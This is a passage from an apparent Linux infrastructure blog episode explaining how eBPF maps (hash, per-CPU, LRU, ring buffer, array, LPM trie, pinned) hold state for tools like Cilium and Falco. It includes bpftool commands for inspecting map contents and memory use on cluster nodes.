    (“stateless” here means each program invocation starts with no memory of previous runs — like a function with no global variables)
  • Every production eBPF tool (Cilium, Falco, Tetragon, Datadog NPM) is a map-based architecture — bpftool map list shows you what it’s actually holding
  • Per-CPU maps eliminate write contention for high-frequency counters; the tool aggregates per-CPU values at export time
  • LRU maps handle unbounded key spaces (IPs, PIDs, connections) without hard errors when full — but eviction is silent, so size generously
  • Ring buffer (kernel 5.8+) is the correct event streaming primitive — Falco and Tetragon both use it
  • Map memory is kernel-locked and invisible to standard memory metrics — account for it explicitly on eBPF-heavy nodes
  • Pinned maps survive restarts; Cilium uses this for zero-disruption connection tracking through upgrades

The Big Picture

  HOW eBPF MAPS CONNECT KERNEL PROGRAMS TO USERSPACE TOOLS

  ┌─────────────────────────────────────────────────────────────┐
  │  Kernel space                                               │
  │                                                             │
  │  [XDP program]  [TC program]  [kprobe]  [tracepoint]        │
  │        │              │           │           │             │
  │        └──────────────┴───────────┴───────────┘             │
  │                              │                              │
  │                   bpf_map_update_elem()                     │
  │                              │                              │
  │                              ▼                              │
  │  ┌─────────────────────────────────────────────────────┐    │
  │  │             eBPF MAP (kernel object)                │    │
  │  │  hash · percpu_hash · lru_hash · ringbuf · lpm_trie │    │
  │  │  Lives outside program invocations.                 │    │
  │  │  Pinned maps (/sys/fs/bpf/) survive restarts.       │    │
  │  └────────────────────┬────────────────────────────────┘    │
  └───────────────────────│─────────────────────────────────────┘
                          │  read / write via file descriptor
                          ▼
  ┌─────────────────────────────────────────────────────────────┐
  │  Userspace tools                                            │
  │                                                             │
  │  Cilium agent  Falco engine  Tetragon  bpftool map dump     │
  └─────────────────────────────────────────────────────────────┘

eBPF maps are the persistent data layer between kernel programs and the tools that consume their output. eBPF programs fire and exit — there’s no memory between invocations. Yet Cilium tracks TCP connections across millions of packets, and Falco correlates a process exec from five minutes ago with a suspicious network connection happening now. The mechanism between stateless kernel programs and the stateful production tools you depend on is what this episode is about — and understanding it changes what you see when you run bpftool map list.


I was trying to identify the noisy neighbor saturating a cluster’s egress link. I had an eBPF program loading cleanly, events firing, everything confirming it was working. But when I read back the per-port connection counters from userspace, everything was zero.

I spent an hour on it before posting to the BCC mailing list. The reply came back fast: eBPF programs don’t hold state between invocations. Every time the kprobe fires, the program starts fresh. The counter I was incrementing existed only for that single call — created, incremented to one, then discarded. On every single invocation. I was counting events one at a time, throwing the count away, and reading nothing.

That’s what eBPF maps solve.

Quick Check: What Maps Are Running on Your Node?

Before the map types walkthrough — see the live state of maps on any cluster node right now:

# SSH into a worker node, then:
bpftool map list

On a node running Cilium + Falco, you’ll see something like:

12: hash          name cilium_ct4_glo    key 24B  value 56B  max_entries 65536  memlock 5767168B
13: lpm_trie      name cilium_ipcache    key 40B  value 32B  max_entries 512000 memlock 327680B
14: percpu_hash   name cilium_metrics    key 8B   value 32B  max_entries 65536  memlock 2097152B
28: ringbuf       name falco_events      max_entries 8388608

Reading this output:
hash, lpm_trie, percpu_hash, ringbuf — the map type (each optimised for a different access pattern)
key 24B value 56B — sizes of a single entry’s key and value in bytes
max_entries — the hard ceiling; when the map is full, behaviour depends on type (see LRU section below)
memlock — non-pageable kernel memory this map consumes (invisible to free and container metrics)

Not running Cilium? On EKS with aws-vpc-cni or GKE with kubenet, there are far fewer maps here — primarily kube-proxy uses iptables rather than BPF maps. Running bpftool map list still works; you’ll just see fewer entries. On a pure iptables-based cluster, most of the maps you see come from the system kernel itself, not a CNI.

Maps Are the Architecture, Not an Afterthought

Maps are kernel objects that live outside any individual program invocation. They’re shared between multiple eBPF programs, readable and writable from userspace, and persistent for the lifetime of the map — which can outlive both the program that created them and the userspace process that loaded them.

Every production eBPF tool is fundamentally a map-based architecture:

  • Cilium stores connection tracking state in BPF hash maps
  • Falco uses ring buffers to stream syscall events to its userspace rule engine
  • Tetragon maintains process tree state across exec events using maps
  • Datadog NPM stores per-connection flow stats in per-CPU maps for lock-free metric accumulation

Run bpftool map list on a Cilium node:

$ bpftool map list
ID 12: hash          name cilium_ct4_glo    key 24B  value 56B   max_entries 65536
#      ^^^^           ^^^^^^^^^^^^^^^^       ^^^^^^   ^^^^^^^     ^^^^^^^^^^^^^^^^
#      type           map name               key size value size  max concurrent entries

ID 13: lpm_trie      name cilium_ipcache    key 40B  value 32B   max_entries 512000
#      longest-prefix-match trie — for IP address + CIDR lookups

ID 14: percpu_hash   name cilium_metrics    key 8B   value 32B   max_entries 65536
#      one copy of this map per CPU — no write contention for high-frequency counters

ID 28: ringbuf       name falco_events      max_entries 8388608
#                                           ^^^^^^^^^^^ 8MB ring buffer for event streaming

Connection tracking, IP policy cache, per-CPU metrics, event stream. Every one of these is a different map type, chosen for a specific reason.

Map Types and What They’re Actually Used For

Hash Maps

The general-purpose key-value store. A key maps to a value — lookup is O(1) average. Cilium’s connection tracking map (cilium_ct4_glo) is a hash map: the key is a 5-tuple (source IP, destination IP, ports, protocol), the value is the connection state.

$ bpftool map show id 12
12: hash  name cilium_ct4_glo  flags 0x0
        key 24B  value 56B  max_entries 65536  memlock 5767168B

The key 24B is the 5-tuple. The value 56B is the connection state record. max_entries 65536 is the upper bound — Cilium can track 65,536 active connections in this map before hitting the limit.

Hash maps are shared across all CPUs on the node. When multiple CPUs try to update the same entry simultaneously — which happens constantly on busy nodes — writes need to be coordinated. For most use cases this is fine. For high-frequency counters updated on every packet, it’s a bottleneck. That’s when you reach for a per-CPU hash map.

Where you see them: connection tracking, per-IP statistics, process-to-identity mapping, policy verdict caching.

Per-CPU Hash Maps

Per-CPU hash maps solve the write coordination problem by giving each CPU its own independent copy of every entry. There’s no sharing, no contention, no waiting — each CPU writes its own copy without touching any other.

The tradeoff: reading from userspace means collecting one value per CPU and summing them up. That aggregation happens in the tool, not the kernel.

# Cilium's per-CPU metrics map — one counter value per CPU
bpftool map dump id 14
key: 0x00000001
  value (CPU 00): 12345
  value (CPU 01): 8901
  value (CPU 02): 3421
  value (CPU 03): 7102
# total bytes for this metric: 31769

Cilium’s cilium_metrics map uses this pattern for exactly this reason — it’s updated on every packet across every CPU on the node. Forcing all CPUs to coordinate writes to a single shared entry at that rate would hurt throughput. Instead: each CPU writes locally, Cilium’s userspace agent sums the values at export time.

Where you see them: packet counters, byte counters, syscall frequency metrics — anywhere updates happen on every event at high volume.

LRU Hash Maps

LRU hash maps add automatic eviction. Same key-value semantics as a regular hash map, but when the map hits its entry limit, the least recently accessed entry is dropped to make room for the new one.

This matters for any map tracking dynamic state with an unpredictable number of keys: TCP connections, process IDs, DNS queries, pod IPs. Without LRU semantics, a full map returns an error on insert — and in production, that means your tool silently stops tracking new entries. Not a crash, not an alert — just missing data.

Cilium’s connection tracking map is LRU-bounded at 65,536 entries. On a node handling high-connection-rate workloads, this can fill up. When it does, Cilium starts evicting old connections to make room for new ones — and if it’s evicting too aggressively, you’ll see connection resets.

# Check current CT map usage vs its limit
bpftool map show id 12
# max_entries tells you the ceiling
# count entries to see current usage
bpftool map dump id 12 | grep -c "^key"

Size LRU maps at 2× your expected concurrent active entries. Aggressive eviction under pressure introduces gaps — not crashes, but missing or incorrect state.

Where you see them: connection tracking, process lineage, anything where the key space is dynamic and unbounded.

Ring Buffers

Ring buffers are how eBPF tools stream events from the kernel to a userspace consumer. Falco reads syscall events from a ring buffer. Tetragon streams process execution and network events through ring buffers. The pattern is the same across all of them:

kernel eBPF program
  → sees event (syscall, network packet, process exec)
  → writes record to ring buffer
  → userspace tool reads it and processes (Falco rules, Tetragon policies)

What makes ring buffers the right primitive for event streaming:

  • Single buffer shared across all CPUs — unlike the older perf_event_array approach which required one buffer per CPU, a ring buffer is one allocation, one file descriptor, one consumer
  • Lock-free — the kernel writes, the userspace tool reads, they don’t block each other
  • Backpressure when full — if the userspace tool can’t keep up, new events are dropped rather than queued indefinitely. The tool can detect and count drops. Falco reports these as Dropped events in its stats output.
# Falco's ring buffer — 8MB
bpftool map list | grep ringbuf
# ID 28: ringbuf  name falco_events  max_entries 8388608

8,388,608 bytes = 8MB. That’s the buffer between Falco’s kernel hooks and its rule engine. If there’s a burst of syscall activity and Falco’s rule evaluation can’t keep up, events drop into that window and are lost.

Sizing matters operationally. Too small and you drop events during normal burst. Too large and you’re holding non-pageable kernel memory that doesn’t show up in standard memory metrics.

# Check Falco's drop rate
falcoctl stats
# or check the Falco logs
journalctl -u falco | grep -i "drop"

Most production deployments run 8–32MB. Start at 8MB, monitor drop rates under load, size up if needed.

Where you see them: Falco event streaming, Tetragon audit events, any tool that needs to move high-volume event data from kernel to userspace.

Array Maps

Array maps are fixed-size, integer-indexed, and entirely pre-allocated at creation time. Think of them as lookup tables with integer keys — constant-time access, no hash overhead, no dynamic allocation.

Cilium uses array maps for policy configuration: a fixed set of slots indexed by endpoint identity number. When a packet arrives and Cilium needs to check policy, it indexes into the array directly rather than doing a hash lookup. For read-heavy, write-rare data, this is faster.

The constraint: you can’t delete entries from an array map. Every slot exists for the lifetime of the map. If you need to track state that comes and goes — connections, processes, pods — use a hash map instead.

Where you see them: policy configuration, routing tables with fixed indices, per-CPU stats indexed by CPU number.

LPM Trie Maps

LPM (Longest Prefix Match) trie maps handle IP prefix lookups — the same operation that a hardware router does when deciding which interface to send a packet out of.

You can store a mix of specific host addresses (/32) and CIDR ranges (/16, /24) in the same map, and a lookup returns the most specific match. If 10.0.1.15/32 and 10.0.0.0/8 are both in the map, a lookup for 10.0.1.15 returns the /32 entry.

Cilium’s cilium_ipcache map is an LPM trie. It maps every IP in the cluster to its security identity — the identifier Cilium uses for policy enforcement. When a packet arrives, Cilium does a trie lookup on the source IP to find out which endpoint sent it, then checks policy against that identity.

# Inspect the ipcache map
bpftool map show id 13
# lpm_trie  name cilium_ipcache  key 40B  value 32B  max_entries 512000

# Look up which security identity owns a pod IP
bpftool map lookup id 13 key hex 20 00 00 00 0a 00 01 0f 00 00 00 00 00 00 00 00 00 00 00 00

Where you see them: IP-to-identity mapping (Cilium), CIDR-based policy enforcement, IP blocklists.


Pinned Maps — State That Survives Restarts

By default, a map’s lifetime is tied to the tool that created it. When the tool exits, the kernel garbage-collects the map.

Pinning writes a reference to the BPF filesystem at /sys/fs/bpf, which keeps the map alive even after the creating process exits:

# See all maps Cilium has pinned
ls /sys/fs/bpf/tc/globals/
# cilium_ct4_global  cilium_ipcache  cilium_metrics  cilium_policy ...

# Inspect a pinned map directly — no Cilium process needed
bpftool map dump pinned /sys/fs/bpf/tc/globals/cilium_ct4_global

# Pin any map by ID for manual inspection
bpftool map pin id 12 /sys/fs/bpf/my_conn_tracker
bpftool map dump pinned /sys/fs/bpf/my_conn_tracker

Cilium pins all its maps under /sys/fs/bpf/tc/globals/. When Cilium restarts — rolling upgrade, crash, OOM kill — it reopens its pinned maps and resumes with existing state intact. Pods maintain established TCP connections through a Cilium restart without disruption.

This is operationally significant: if you’re evaluating eBPF-based tools for production, check whether they pin their maps. A tool that doesn’t loses all its tracked state on every restart — connection tracking resets, process lineage gaps, policy state rebuilt from scratch.


Map Memory: A Production Consideration

Map memory is kernel-locked — it cannot be paged out, and it doesn’t show up in standard memory pressure metrics. Your node’s free output and container memory limits don’t account for it.

Kernel-locked memory is memory the OS guarantees will never be swapped to disk — it stays in RAM permanently. The kernel requires this for eBPF maps because a kernel program running during a network interrupt cannot wait for a page fault. The side effect: it doesn’t appear in top, free, or container memory metrics, so it’s easy to accidentally provision nodes without accounting for it.

# Total eBPF map memory locked on this node
bpftool map list -j | python3 -c "
import json,sys
maps=json.load(sys.stdin)
total=sum(m.get('bytes_memlock',0) for m in maps)
print(f'Total map memory: {total/1024/1024:.1f} MB')
"

# Check system memlock limit (unlimited is correct for eBPF tools)
ulimit -l

# Check what Cilium's systemd unit sets
systemctl show cilium | grep -i memlock

On a node running Cilium + Falco + Datadog NPM, I’ve seen 200–400MB of map memory locked. That’s real, non-pageable kernel memory. If you’re sizing nodes for eBPF-heavy workloads, account for this separately from your pod workload memory.

If an eBPF tool fails to load with a permission error despite having enough free memory, the root cause is usually the memlock ulimit for the process. Cilium, Falco, and most production tools set LimitMEMLOCK=infinity in their systemd units. Verify this if you’re deploying a new eBPF-based tool and seeing unexpected load failures.


Inspecting Maps in Production

# List all maps: type, name, key/value sizes, memory usage
bpftool map list

# Dump all entries in a map (careful with large maps)
bpftool map dump id 12

# Look up a specific entry by key
bpftool map lookup id 12 key hex 0a 00 01 0f 00 00 00 00

# Watch map stats live
watch -n1 'bpftool map show id 12'

# See all maps for a specific tool by checking its pinned path
ls /sys/fs/bpf/tc/globals/                    # Cilium
ls /sys/fs/bpf/falco/                         # Falco (if pinned)

# Cross-reference map IDs with the programs using them
bpftool prog list
bpftool map list

⚠ Production Gotchas

A full LRU map drops state silently, not loudly
When Cilium’s CT map fills up, it starts evicting the least recently used connections — not returning an error. You see connection resets, not a tool alert. Check map utilisation (bpftool map dump id X | grep -c key) against max_entries on nodes with high connection rates.

Ring buffer drops don’t stop the tool — they create gaps
When Falco’s ring buffer fills up, events are dropped. Falco keeps running. The rule engine keeps processing. But you have gaps in your syscall visibility. Monitor Dropped events in Falco’s stats and size the ring buffer accordingly.

Map memory is invisible to standard monitoring
200–400MB of kernel-locked memory on a Cilium + Falco node doesn’t appear in top, container memory metrics, or memory pressure alerts. Size eBPF-heavy nodes with this in mind and add explicit map memory monitoring via bpftool.

Tools that don’t pin their maps lose state on restart
A Cilium restart with pinned maps = zero-disruption connection tracking. A tool without pinning = all tracked state rebuilt from scratch. This matters for connection tracking tools and any tool maintaining process lineage.

perf_event_array on kernel 5.8+ is the old way
Older eBPF tools use per-CPU perf_event_array for event streaming. Ring buffer is strictly better — single allocation, lower overhead, simpler consumption. If you’re running a tool that still uses perf_event_array on a 5.8+ kernel, it’s using a legacy path.


Key Takeaways

  • eBPF programs are stateless — maps are where all state lives, between invocations and between kernel and userspace
  • Every production eBPF tool (Cilium, Falco, Tetragon, Datadog NPM) is a map-based architecture — bpftool map list shows you what it’s actually holding
  • Per-CPU maps eliminate write contention for high-frequency counters; the tool aggregates per-CPU values at export time
  • LRU maps handle unbounded key spaces (IPs, PIDs, connections) without hard errors when full — but eviction is silent, so size generously
  • Ring buffer (kernel 5.8+) is the correct event streaming primitive — Falco and Tetragon both use it
  • Map memory is kernel-locked and invisible to standard memory metrics — account for it explicitly on eBPF-heavy nodes
  • Pinned maps survive restarts; Cilium uses this for zero-disruption connection tracking through upgrades

What’s Next

You know what program types run in the kernel, and you know how they hold state.

Get EP06 in your inbox when it publishes → linuxcent.com/subscribe But there’s a problem anyone running eBPF-based tools eventually runs into: a tool works on one kernel version and breaks on the next. Struct layouts shift between patch versions. Field offsets move. EP06 covers CO-RE (Compile Once, Run Everywhere) and libbpf — the mechanism that makes tools like Cilium and Falco survive your node upgrades without recompilation, and why kernel version compatibility is a solved problem for any tool built on this toolchain.